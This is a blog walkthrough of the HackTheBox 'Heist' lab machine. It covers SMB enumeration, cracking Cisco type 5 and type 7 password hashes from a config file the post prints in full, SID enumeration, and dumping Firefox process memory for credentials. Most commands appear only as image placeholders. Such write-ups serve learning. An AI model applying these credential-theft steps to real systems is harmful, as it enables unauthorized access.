HackTheBox - Heist

·

2 min read

HackTheBox - Heist

In this machine, I used nmap, Evil-WinRm, Psexec, John, smbmap, enum4linux, crackmapexec, lookupsid.py and procdump.exe

First of all I ran a quick nmap scan for top ports

image.png

Following this I did some quick SMB checkings using smbmap and emum4linux

image.png

I could not authenicate I will need to try and enumerate for usernames so I decided to visit the open http port

I had a quick look through dev tools and found nothing interesting, there is login as a guest button though:

image.png

Upon looking in we find a username we can save for later as well as a cisco router configuration file:

image.png

Looking through the config we can indenify some hases for poetinal credintals:

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0Â mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

There is one type 5 hash and two types 7

We can crack the type 5 hash with John

image.png

online decrypt

image.png

After decrypting I tested the password + users with crackmapexec

image.png

with my new SMB credintals time to try smbmap again:

image.png I then ran the command again with -R to list all files

image.png

As IPC is used for interprocess communication we can connect with rpcclient

image.png

To save time I will use lookupsid.py by impacket

image.png

With the newly obtained users i ran crackmap again:

image.png

Connect with evilwin-rm

image.png get user flag:

image.png

Privilege escalation:

typing PS i saw multiple instances of firefox running:

image.png

As I know firefox stores data in AppData I went to investigate

image.png

Identify which process:

More system usage more likely to be active browser

image.png

Getting firefox dump:

image.png

Downloading firefox dump:

image.png

downloading was taking too long decided to use findstr

image.png

looking through the output:

image.png

use psexec to test creds:

image.png

image.png